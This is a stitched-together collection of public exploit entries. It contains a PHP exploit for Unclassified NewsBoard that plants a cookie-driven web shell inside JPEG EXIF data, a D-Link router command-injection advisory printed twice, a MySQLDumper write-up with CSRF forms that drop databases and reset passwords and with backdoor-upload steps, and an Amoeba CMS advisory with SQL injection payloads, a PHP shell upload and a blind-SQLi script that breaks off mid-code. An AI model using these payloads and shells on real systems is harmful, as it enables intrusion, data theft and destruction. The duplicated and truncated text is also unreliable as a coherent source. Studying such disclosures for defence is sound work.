chr(0x14).chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).
chr(0x01).chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).
chr(0x00).chr(0x23).chr(0x94).chr(0x09).chr(0x2e).chr(0xff).chr(0xd9).chr(0x00);
/*
this image has this code inside as EXIF metadata content
<?php
$fp=fopen("suntzu.php","w");
fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo 56789;passthru(\$_COOKIE[cmd]);echo 56789;?>");
fclose($fp);
chmod("suntzu.php",777);
?>
*/
$data='-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="action"
edit
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="id"
'.$id.'
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="cat"
postoptions
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="Signature"
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="avatar"
1
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="avatarfile"; filename="suntzu.jpeg"
Content-Type: image/pjpeg
'.$shell.'
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="avatarurl"
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="photofile"; filename="suntzoi.jpeg"
Content-Type: image/pjpeg
'.$shell.'
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="photourl"
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="photo"
1
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="Save"
Save
-----------------------------7d614f2d12043e--
';
$packet ="POST ".$p."forum.php?req=cp HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d614f2d12043e\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: ".$cookie."\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);
echo "step 3 -> try to include avatar or photo...\r\n";
$xpl=array(
urlencode("../../upload/avatar_".$id.".jpeg".chr(0x00)),
urlencode("../../upload/photo_".$id.".jpeg".chr(0x00))
);
for ($i=0; $i<=count($xpl)-1; $i++)
{
$packet ="GET ".$p."unb_lib/abbc.css.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ABBC[Config][smileset]=".$xpl[$i]."; \r\n"; //pass evil var through cookies
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);
}
echo "step 4 -> Launch commands...\r\n";
$packet ="GET ".$p."unb_lib/suntzu.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd.";\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);
if (strstr($html,"56789"))
{
echo "Exploit succeeded...";
$temp=explode("56789",$html);
die("\r\n".$temp[1]."\r\n");
}
//if you are here...
echo "Exploit failed...";
?>
original url:
http://retrogod.altervista.org/unb_161p1_incl_xpl.html
Remote exploit for an arbitrary file inclusion flaw in Unclassified NewsBoard versions 1.6.1 and below.
Michael Messner/D-Link Remote Command Execution ( na)
Device Name: DIR-600 / DIR-300 revB / DIR-815 / DIR-645 / DIR-412 / DIR-456 / DIR-110 Vendor: D-Link ============ Vulnerable Firmware Releases: ============ DIR-815 v1.03b02 (unauthenticated command injection) DIR-645 v1.02 (unauthenticated command injection) DIR-645 v1.03 (authenticated command injection) DIR-600 below v2.16b01 (with v2.16b01 D-Link also fixes different vulnerabilities reported in M1ADV2013-003) DIR-300 revB v2.13b01 (unauthenticated command injection) DIR-300 revB v2.14b01 (authenticated command injection) DIR-412 Ver 1.14WWB02 (unauthenticated command injection) DIR-456U Ver 1.00ONG (unauthenticated command injection) DIR-110 Ver 1.01 (unauthenticated command injection) Possible other versions and devices are also affected by this vulnerability. ============ Shodan Torks ============ Shodan search: Server: Linux, HTTP/1.1, DIR => 9300 results ============ Vulnerability Overview: ============ * OS Command Injection The vulnerability is caused by missing input validation in the dst parameter and missing session validation and can be exploited to inject and execute arbitrary shell commands. WARNING: You do not need to be authenticated to the device to insert and execute malicious commands. Hint: On different devices like the DIR-645 wget is preinstalled and you are able to upload and execute your malicious code. => Parameter: dst Example Exploit: POST /diagnostic.php HTTP/1.1 Host: xxxx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://xxxx/ Content-Length: 41 Cookie: uid=hfaiGzkB4z Pragma: no-cache Cache-Control: no-cache act=ping&dst=%26%20COMMAND%26 Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/05.04.2013%20-%20Dlink-DIR-645_msf-shell.txt.png * Information disclosure: Nice server banner to detect this type of devices easily: Server Banner: Server: Linux, HTTP/1.1, DIR-815 Server Banner: Server: Linux, HTTP/1.1, DIR-645 Server Banner: Server: Linux, HTTP/1.1, DIR-600 Server Banner: Server: Linux, HTTP/1.1, DIR-300 Server Banner: Server: Linux, HTTP/1.1, DIR-412 Server Banner: Server: Linux, HTTP/1.1, DIR-456U Server Banner: Server: Linux, HTTP/1.1, DIR-110 * Information Disclosure: Detailed device information including Model Name, Hardware Version, Linux Kernel, Firmware version, Language and MAC Addresses are available via the network. Request: http://<IP>IP/DevInfo.txt or http://<IP>IP/version.txt (check the source of the site) Response to DevInfo.txt: Firmware External Version: V1.00 Firmware Internal Version: a86b Model Name: DIR-815 Hardware Version: WLAN Domain: xxx Kernel: 2.6.33.2 Language: en Graphcal Authentication: Disable LAN MAC: xx WAN MAC: xx WLAN MAC: xx These details are available without authentication. ============ Solution ============ DIR-645: Update to firmware v1.04b5 DIR-600: Update to firmware v2.16B01 DIR-300rev B: Update to firmware 2.14B01 fixes the authentication bypass but not the command injection vulnerability. Other devices: No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de/advisories Twitter: @s3cur1ty_de ============ Time Line: ============ 14.12.2012 - discovered vulnerability in first device 14.12.2012 - contacted dlink via the webinterface http://www.dlink.com/us/en/home-solutions/contact-d-link 20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D-Link 21.12.2012 - D-link responded that they will check the findings 11.01.2013 - requested status update 25.01.2013 - requested status update and updated D-Link with the other vulnerable devices 25.01.2013 - D-Link responded that this is a security problem from the user and/or browser and they will not provide a fix. 07.02.2013 - after the DIR-600/300 drama D'Link contacted me and now they are talking with me ;) since 07.02.2013 - Good communication and firmware testing 27.02.2013 - Roberto Paleari releases details about authentication bypass in DIR-645 - http://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt 05.04.2013 - vendor releases firmware updates 05.04.2013 - public release ===================== Advisory end =====================
D-Link devices DIR-600 / DIR-300 revB / DIR-815 / DIR-645 / DIR-412 / DIR-456 / DIR-110 all suffer from a remote command injection vulnerability.
m-1-k-3/Multiple D-Link Devices - Multiple Vulnerabilities ( hardware)
# Exploit Title: Multiple Vulnerabilities in Dlink devices # Date: 05.04.2013 # Exploit Author: m-1-k-3 # Vendor Homepage: http://www.dlink.de # Software Link: http://www.dlink.de/cs/Satellite?c=Product_C&childpagename=DLinkEurope-DE%2FDLProductCarouselSingle&cid=1197391383981&p=1197318958269&packedargs=ProductParentID%3D1197318677527%26category%3DQuickProductFinder%26locale%3D1195806663795%26term%3DDIR-645&pagename=DLinkEurope-DE%2FDLWrapper # Version: different devices and versions are affected Device Name: DIR-600 / DIR-300 revB / DIR-815 / DIR-645 / DIR-412 / DIR-456 / DIR-110 Vendor: D-Link ============ Vulnerable Firmware Releases: ============ DIR-815 v1.03b02 (unauthenticated command injection) DIR-645 v1.02 (unauthenticated command injection) DIR-645 v1.03 (authenticated command injection) DIR-600 below v2.16b01 (with v2.16b01 D-Link also fixes different vulnerabilities reported in M1ADV2013-003) DIR-300 revB v2.13b01 (unauthenticated command injection) DIR-300 revB v2.14b01 (authenticated command injection) DIR-412 Ver 1.14WWB02 (unauthenticated command injection) DIR-456U Ver 1.00ONG (unauthenticated command injection) DIR-110 Ver 1.01 (unauthenticated command injection) Possible other versions and devices are also affected by this vulnerability. ============ Shodan Torks ============ Shodan search: Server: Linux, HTTP/1.1, DIR => 9300 results ============ Vulnerability Overview: ============ * OS Command Injection The vulnerability is caused by missing input validation in the dst parameter and missing session validation and can be exploited to inject and execute arbitrary shell commands. WARNING: You do not need to be authenticated to the device to insert and execute malicious commands. Hint: On different devices like the DIR-645 wget is preinstalled and you are able to upload and execute your malicious code. => Parameter: dst Example Exploit: POST /diagnostic.php HTTP/1.1 Host: xxxx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://xxxx/ Content-Length: 41 Cookie: uid=hfaiGzkB4z Pragma: no-cache Cache-Control: no-cache act=ping&dst=%26%20COMMAND%26 Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/05.04.2013%20-%20Dlink-DIR-645_msf-shell.txt.png * Information disclosure: Nice server banner to detect this type of devices easily: Server Banner: Server: Linux, HTTP/1.1, DIR-815 Server Banner: Server: Linux, HTTP/1.1, DIR-645 Server Banner: Server: Linux, HTTP/1.1, DIR-600 Server Banner: Server: Linux, HTTP/1.1, DIR-300 Server Banner: Server: Linux, HTTP/1.1, DIR-412 Server Banner: Server: Linux, HTTP/1.1, DIR-456U Server Banner: Server: Linux, HTTP/1.1, DIR-110 * Information Disclosure: Detailed device information including Model Name, Hardware Version, Linux Kernel, Firmware version, Language and MAC Addresses are available via the network. Request: http://<IP>IP/DevInfo.txt or http://<IP>IP/version.txt (check the source of the site) Response to DevInfo.txt: Firmware External Version: V1.00 Firmware Internal Version: a86b Model Name: DIR-815 Hardware Version: WLAN Domain: xxx Kernel: 2.6.33.2 Language: en Graphcal Authentication: Disable LAN MAC: xx WAN MAC: xx WLAN MAC: xx These details are available without authentication. ============ Solution ============ DIR-645: Update to firmware v1.04b5 DIR-600: Update to firmware v2.16B01 DIR-300rev B: Update to firmware 2.14B01 fixes the authentication bypass but not the command injection vulnerability. Other devices: No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de/advisories Twitter: @s3cur1ty_de ============ Time Line: ============ 14.12.2012 - discovered vulnerability in first device 14.12.2012 - contacted dlink via the webinterface http://www.dlink.com/us/en/home-solutions/contact-d-link 20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D-Link 21.12.2012 - D-link responded that they will check the findings 11.01.2013 - requested status update 25.01.2013 - requested status update and updated D-Link with the other vulnerable devices 25.01.2013 - D-Link responded that this is a security problem from the user and/or browser and they will not provide a fix. 07.02.2013 - after the DIR-600/300 drama D'Link contacted me and now they are talking with me ;) since 07.02.2013 - Good communication and firmware testing 27.02.2013 - Roberto Paleari releases details about authentication bypass in DIR-645 - http://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt 05.04.2013 - vendor releases firmware updates 05.04.2013 - public release ===================== Advisory end =====================
Akastep/MySQLDumper 1.24.4 LFI / XSS / CSRF / Code Execution / Traversal ( na)
================================================================================================
Vulnerable Software: MySQLDumper Version 1.24.4
Downloaded from: http://sourceforge.net/projects/mysqldumper/files/
(MD5 SUM: b62357a0d5bbb43779d16427c30966a1 *MySQLDumper1.24.4.zip)
================================================================================================
About Software:
What is MySQLDumper ?
MySQLDumper is a PHP and Perl based tool for backing up MySQL databases.
You can easily dump your data into a backup file and - if needed - restore it.
It is especially suited for shared hosting webspaces, where you don't have shell access.
MySQLDumper is an open source project and released under the GNU-license.
================================================================================================
Tested:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
MYSQL: 5.5.23
================================================================================================
Vuln Desc:
MySQLDumper Version 1.24.4 is prone to:
LFI,XSS,CSRF,PHP CODE ExeCution,traversal,Info Disclosure vulns.
Local File Inclusion
http://192.168.0.15/learn/cubemail/install.php?language=../../../../../../../../../../../../../../../../../etc/passwd%00
/* Vulnerable COde Section
//install.php
if (!@ob_start("ob_gzhandler")) @ob_start();
$install_ftp_server=$install_ftp_user_name=$install_ftp_user_pass=$install_ftp_path="";
$dbhost=$dbuser=$dbpass=$dbport=$dbsocket=$manual_db='';
foreach ($_GET as $getvar=>$getval)
{
${$getvar}=$getval;
}
foreach ($_POST as $postvar=>$postval)
{
${$postvar}=$postval;
}
include_once ( './inc/functions.php' );
include_once ( './inc/mysql.php' );
include_once ( './inc/runtime.php' );
if (!isset($language)) $language="en";
$config['language']=$language;
include ( './language/lang_list.php' );
include ( 'language/' . $language . '/lang_install.php' );
include ( 'language/' . $language . '/lang_main.php' );
include ( 'language/' . $language . '/lang_config_overview.php' );
*/
XSS on inputs via $_POST
http://192.168.0.15/learn/cubemail/install.php?phase=1&language=en&submit=Installation
http://192.168.0.15/learn/cubemail/index.php?page=javascript:alert%28document.cookie%29;
/*VUlnerable code section
//index.php
<?php
if (!@ob_start("ob_gzhandler")) @ob_start();
include ('./inc/functions.php');
$page=(isset($_GET['page'])) ? $_GET['page'] : 'main.php';
if (!file_exists("./work/config/mysqldumper.php"))
{
header("location: install.php");
ob_end_flush();
die();
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="Author" content="Daniel Schlichtholz">
<title>MySQLDumper</title>
</head>
<frameset border=0 cols="190,*">
<frame name="MySQL_Dumper_menu" src="menu.php" scrolling="no" noresize
frameborder="0" marginwidth="0" marginheight="0">
<frame name="MySQL_Dumper_content" src="<?php
echo $page; // <=here is
?>"
scrolling="auto" frameborder="0" marginwidth="0" marginheight="0">
</frameset>
</html>
<?php
ob_end_flush();
*/
XSS via $_GET
http://192.168.0.15/learn/cubemail/install.php?phase=8%3Cscript%3Ealert%281%29;%3C/script%3E&language=en&submit=Installation
http://192.168.0.15/learn/cubemail/sql.php?db=0&dbid=1&tablename=%3Cscript%3Ealert%281%29;%3C/script%3E
http://192.168.0.15/learn/cubemail/sql.php?db=0&dbid=%3Cscript%3Ealert%281%29;%3C/script%3E&tablename=1
http://192.168.0.15/learn/cubemail/restore.php?filename=%3Cscript%3Ealert%281%29;%3C/script%3E
CSRF Delete application protection via $_GET
<img src="http://192.168.0.15/learn/cubemail/main.php?action=deletehtaccess" />
*After this Application will become fully unprotected from World.*
CSRF Drop database:
<img src="http://localhost/tld/meonyourpc.PNG" heigth="250" width="300" />
<form name="hackit" id="hackit" action="http://192.168.0.15/learn/cubemail/main.php?action=db&dbid=1" method="post">
<p><blink>Hotlink Protection is Active! Please click refresh button.</blink></p>
<input name="kill1" value="Refresh" onclick="alert('Congrats!) Your Database Dropped!')" type="submit">
</form>
kill0 is always information_schema (obviously you can't drop it)
Try to increment that index
in ex:
kill1 etc.
CSRF Uninstall Application via $_GET
http://192.168.0.15/learn/cubemail/install.php?language=en&phase=101
or
http://192.168.0.15/learn/cubemail/install.php?language=en&phase=2 (This will delete existing config.php file)
CSRF change password:
<body onload="javascript:document.forms[0].submit()">
<form method="post" action="http://192.168.0.15/learn/cubemail/main.php?action=schutz">
<input name="username" id="username" type="text" value="pwnyou" />
<input name="userpass1" id="userpass1" type="text" value="pwnyou" />
<input name="userpass2" id="userpass2" type="text" value="pwnyou" />
<!--SHA1 (all Systems) -->
<input type="radio" name="type" id="type2" value="2" checked="checked" >
</form>
username:pwnyou
password:pwnyou
CSRF:Execute SQL commands via $_GET
In eg:( Create Denial Of Service Condition)
<img src="http://192.168.0.15/learn/cubemail/sql.php?sql_statement=select+benchmark%28100000000,md5%28now%28%29%29%29--" heigth="0" width="0" />
After gain access to application (in eg: after successfully exploitation CSRF via delete protection technique)
remote attacker can use this techniques to upload his/her backdoor.
As result this will completely compromise site.
*Upload backdoor:*
Rename your backdoor on your pc to me.php.gz
Then switch to:
http://192.168.0.15/learn/cubemail/filemanagement.php?action=files
Upload it:
Then Switch to:
http://192.168.0.15/learn/cubemail/main.php?action=edithtaccess
On input box called: File:
enter relative/absolute path to your uploaded me.php.gz (default ./work/backup/me.php.gz)
Click RELOAD button.
On inputbox called File: Change file extension to:
./work/backup/me.php
Click save button and Vuala you have your own backdoor there.
You can find it:
http://192.168.0.15/learn/cubemail/work/backup/me.php
Same tehcnique can be used without upload any file:
Todo so:
Switch to
http://192.168.0.15/learn/cubemail/filemanagement.php?action=files
Enter non existent file name on input called File:
in eg:
mybackdoor.php
Click reload button.
it will ask *Create it?*
Click *Create* Button.
Copy paste your backdoor content to textarea and Click Save button.
Same technique can be used to add CUSTOM .htaccess Handler (to execute backdoor in eg: as *.gif file)
*NOTE* Second technique can be used by attacker to overwrite existing files./read arbitraty files on site/server.
Theris also chance to execute our code using eval PHP language *construct*.
We have PHP Code ExeCution here:
Vulnerable code section:
/*
//menu.php
if (isset($_POST['selected_config'])||isset($_GET['config']))
{
if (isset($_POST['selected_config'])) $new_config=$_POST['selected_config'];
// Configuration was switched in content frame?
if (isset($_GET['config'])) $new_config=$_GET['config'];
// restore the last active menuitem
if (is_readable($config['paths']['config'].$new_config.'.php'))
{
clearstatcache();
unset($databases);
$databases=array();
if (read_config($new_config))
{
$config['config_file']=$new_config;
$_SESSION['config_file']=$new_config; //$config['config_file'];
$config_refresh='
<script language="JavaScript" type="text/javascript">
if (parent.MySQL_Dumper_content.location.href.indexOf("config_overview.php")!=-1)
{
var selected_div=parent.MySQL_Dumper_content.document.getElementById("sel").value;
}
else selected_div=\'\';
parent.MySQL_Dumper_content.location.href=\'config_overview.php?config='.urlencode($new_config).'&sel=\'+selected_div</script>';
}
if (isset($_GET['config'])) $config_refresh=''; //Neu-Aufruf bei Uebergabe aus Content-Bereich verhindern
}
}
*/
As you can see we can traverse it +
if we will look to read_config() function
//inc/functions_global.php
function read_config($file=false)
{
global $config,$databases;
$ret=false;
if (!$file) $file=$config['config_file'];
// protect from including external files
$search=array(':', 'http', 'ftp', ' ');
$replace=array('', '', '', '');
$file=str_replace($search,$replace,$file);
if (is_readable($config['paths']['config'].$file.'.php'))
{
// to prevent modern server from caching the new configuration we need to evaluate it this way
clearstatcache();
$f=implode('',file($config['paths']['config'].$file.'.php'));
$f=str_replace('<?php','',$f);
$f=str_replace('?>','',$f);
eval($f);
$config['config_file']=$file;
$_SESSION['config_file']=$config['config_file'];
$ret=true;
}
return $ret;
}
this means remote attacker can iterate his/her code as PHP.(Notice: eval($f))
Our exploit:
http://192.168.0.15/learn/cubemail/menu.php?config=../../ss
where ss = ss.php
#cat ss.php # in eg attacker uploaded his/her own file:
echo 'Our command executed ' . getcwd();
phpinfo();
Print screen:
http://s007.radikal.ru/i302/1204/c3/fd5aac2a58c5.png
Theris also a lot of CROSS Site Scripting Vulnerabilities: (XSS)
Switch to:
http://192.168.0.15/learn/cubemail/sql.php?db=information_schema&dbid=0
Enter:
select '<script>alert(1);</script>'
and click Execute SQL Statement.
Traversal:
/*Vulnerable Code Section:
//filemanagement.php
<?php
if (isset($_GET['action'])&&$_GET['action']=='dl') $download=true;
include ('./inc/header.php');
include_once ('./language/'.$config['language'].'/lang.php');
include_once ('./language/'.$config['language'].'/lang_filemanagement.php');
include_once ('./language/'.$config['language'].'/lang_config_overview.php');
include_once ('./language/'.$config['language'].'/lang_main.php');
include_once ('./inc/functions_files.php');
include_once ('./inc/functions_sql.php');
$msg='';
$dump=array();
if ($config['auto_delete']==1) $msg=AutoDelete();
get_sql_encodings(); // get possible sql charsets and also get default charset
//0=Datenbank 1=Struktur
$action=(isset($_GET['action'])) ? $_GET['action'] : 'files';
$kind=(isset($_GET['kind'])) ? $_GET['kind'] : 0;
$expand=(isset($_GET['expand'])) ? $_GET['expand'] : -1;
$selectfile=(isset($_POST['selectfile'])) ? $_POST['selectfile'] : "";
$destfile=(isset($_POST['destfile'])) ? $_POST['destfile'] : "";
$compressed=(isset($_POST['compressed'])) ? $_POST['compressed'] : "";
$dk=(isset($_POST['dumpKommentar'])) ? ((get_magic_quotes_gpc()) ? stripslashes($_POST['dumpKommentar']) : $_POST['dumpKommentar']) : "";
$dk=str_replace(':','|',$dk); // remove : because of statusline
$dump['sel_dump_encoding']=(isset($_POST['sel_dump_encoding'])) ? $_POST['sel_dump_encoding'] : get_index($config['mysql_possible_character_sets'],$config['mysql_standard_character_set']);
$dump['dump_encoding']=isset($config['mysql_possible_character_sets'][$dump['sel_dump_encoding']]) ? $config['mysql_possible_character_sets'][$dump['sel_dump_encoding']] : 0;
if ($action=='dl')
{
// Download of a backup file wanted
$file='./'.$config['paths']['backup'].urldecode($_GET['f']);
if (is_readable($file))
{
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename='.basename($file));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Content-Length: '.(string) filesize($file));
flush();
$file=fopen($file,"rb");
while (!feof($file))
{
print fread($file,round(100*1024));
flush();
}
fclose($file);
}
//readfile($file);
exit();
}
*/
Exploit:
http://192.168.0.15/learn/cubemail/filemanagement.php?action=dl&f=../../config.php
http://192.168.0.15/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00
This technique can be used by attacker to download arbitraty files from site/server.
Print screen:
http://s017.radikal.ru/i431/1204/e2/9075bb5fecd4.png
Information Disclosure:
Try to Direct access to this file:
http://192.168.0.15/learn/cubemail/restore.php
Generates a lot of Notice's.
http://192.168.0.15/learn/cubemail/dump.php
Generates a lot of Notice's.
http://192.168.0.15/learn/cubemail/refresh_dblist.php
Fatal error: Call to undefined function MSD_mysql_connect() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\cubemail\inc\functions.php on line 147
NOTE: May be previous versions too affected but not tested.
================================ EOF ======================================
+++++++Greetz to all++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com and
to all AA Team.
++++++++++++++++++++++++++++++
Thank you.
/AkaStep ^_^
Live 1335567729
MySQLDumper version 1.24.4 suffers from code execution, cross site request forgery, cross site scripting, local file inclusion, and directory traversal vulnerabilities.
mr_me/Amoeba CMS v1.01 multiple remote vulnerabilities ( php)
#!/usr/bin/python
"""
Amoeba CMS v1.01 multiple remote vulnerabilities:
Vendor: http://www.amoebacms.com/
Found by: mr_me
Contact date: 20/12/2010 2:37pm EST
SQL Injection:
=============
There is quite a few instances of pre/post auth SQL Injection in the web application. In one particular SQLi the attacker
controlled input is being used for multiple queries, and as such seems to fail on the second query when using the _ character.
This character is used as a wildcard in the second query as per the MySql manual. Therefore stealing data from the 'amb_users'
table may prove difficult. Additionaly, order by SQL Injection is present, which doubles the fun :0)
Pre-auth SQL Injection PoC (refer below to an automated working PoC):
---------------------------------------------------------------------
http://[target]/[path]/index.php?mod=cat&com=news&cpID=1+or+1=1 << true
http://[target]/[path]/index.php?mod=cat&com=news&cpID=1+or+1=2 << false
Post-auth SQL Injection PoCs:
-----------------------------
These will require the attacker to obtain access to the backend somehow.
Only one cookie is needed to reach this backend (ambid).
PoC 1:
------
POST /[PATH]/admin/index.php?mod=group&com=menu HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101209 Fedora/3.6.13-1.fc13 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ambid=5i5nrbl5d09f3ktqkh7sfe1s94
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
pageingsize=1+uNiOn+sEleCt+1,coNcAt(user_name,0x3a,users_password),3+from+amb_users--
PoC 2:
------
http://[target]/[path]/admin/index.php?mod=cat&com=gallery&cpID=1+or+1=1 << true
http://[target]/[path]/admin/index.php?mod=cat&com=gallery&cpID=1+or+1=2 << false
Shell Upload Vulnerability:
==========================
Interestingly enough, this application uses a whitelist extension approach which is stored in the database (amb_media_type)!
Unfortunately/fortunately they still allow a '.whateva' extension in the filename, as long as it doesnt end in an extension
that is not on the whitelist. As a fatality the attacker can upload content with 'malicious' code inside and 'get a shell'
by using an Apache AddType directive. Once the request is made, the application will re-write the file to the original/ dir
using the php time() added into its name. See below:
PoC:
----
POST /webapps/amoeba2/admin/index.php?mod=manip&com=media&mediaType=IMAGE&name=lol.php.jpg HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101209 Fedora/3.6.13-1.fc13 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ambid=5pk8u31pobv3qr0tci03o7tog5
Content-Type: application/octet-stream
Content-Length: 31
<?PHP system($_GET['cmd']); ?>
Server Response:
----------------
{"jsonrpc" : "2.0", "result" : null, "chunk" : "0", "chunks" : "0", "name" : "lol.php-1293423431.jpg", "id" : "id"}
Then we can access our shell at:
http://[target]/[path]/media/original/lol.php-1293423431.jpg?cmd=id
Logic Flaws:
===========
Password disclosure & password reset:
--------------------
Password hash disclosure in the admin console. Just change uID to whateva your current uID once you have stolen the admin cookie.
Additionaly you can reset the admins password, without actually knowing the password. o_O Suprise surpise, its the same link:
PoC:
---
http://[target]/[path]/admin/index.php?mod=list&com=user&uID=2&action=edit
"""
# Amoeba CMS v1.0.1 Remote Blind SQL Injection Exploit
# ----------------------------------------------->
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# ----------------------------------------------->
# 8 queries per char, much much cleaner.
#
# [mr_me@pluto amoeba]$ python amoeba0day.py -p 127.0.0.1:8080 -s 'whateva' -t 192.168.1.15 -d /webapps/amoeba2/
#
# | --------------------------------------------- |
# | Amoeba CMS Remote Blind SQL Injection Exploit |
# | by mr_me - net-ninja.net -------------------- |
#
# (+) Exploiting target @: http://192.168.1.15/webapps/amoeba2/
# (+) Testing Proxy @ 127.0.0.1:8080..
# (+) Proxy is working!
# (+) Using string 'whateva' for the true page
# (+) This will take time, go grab a coffee..
#
# (!) Getting database version: 5.1.41-3ubuntu12.8
# (!) Getting database user: root@localhost
# (!) Getting database name: amoeba2
# (!) w00t! You have access to MySQL database!
# (+) Dumping hashs hold onto your knickers..
# (+) The username and hashed password is: root:*EE4E2773D7530819563F0DC6FCE27446A51C9413
# (+) PoC finished.
import sys, urllib, re
from optparse import OptionParser
# all possible decimal values of printable ascii characters
# 8 requests per char, much much cleaner.
lower_value = 0
upper_value = 126
vuluri = "index.php?mod=cat&com=news&cpID=1"
basicInfo = {'version':'version()', 'user':'user()', 'name':'database()'}
usage = "./%prog [<options>] -s [true string] -t [target] -d [directory]"
usage += "\nExample: ./%prog -p localhost:8080 -s 'Author:' -t 192.168.2.15 -d /amoeba/"
parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
help="The Target server <server:port>")
parser.add_option("-d", type="string", action="store", dest="directory",
help="Directory path to the CMS")
parser.add_option("-s", type="string", action="store", dest="trueStr",
help="String that is on the 'true' page (used with the -b option)")
(options, args) = parser.parse_args()
def banner():
print "\n\t| --------------------------------------------- |"
print "\t| Amoeba CMS Remote Blind SQL Injection Exploit |"
print "\t| by mr_me - net-ninja.net -------------------- |\n"
if len(sys.argv) < 5:
banner()
parser.print_help()
sys.exit(1)
def setTargetHTTP():
if options.target[0:7] != 'http://':
options.target = "http://" + options.target
return options.target
def getProxy():
try:
proxy = {'http': "http://"+options.proxy}
opener = urllib.FancyURLopener(proxy)
except(socket.timeout):
print "\n(-) Proxy Timed Out"
sys.exit(1)
except(),msg:
print "\n(-) Proxy Failed"
sys.exit(1)
return opener
def getServerResponse(exploit):
if options.proxy:
try:
options.target = setTargetHTTP()
opener = getProxy()
check = opener.open(options.target+options.directory+exploit).read()
except urllib.error.HTTPError, error:
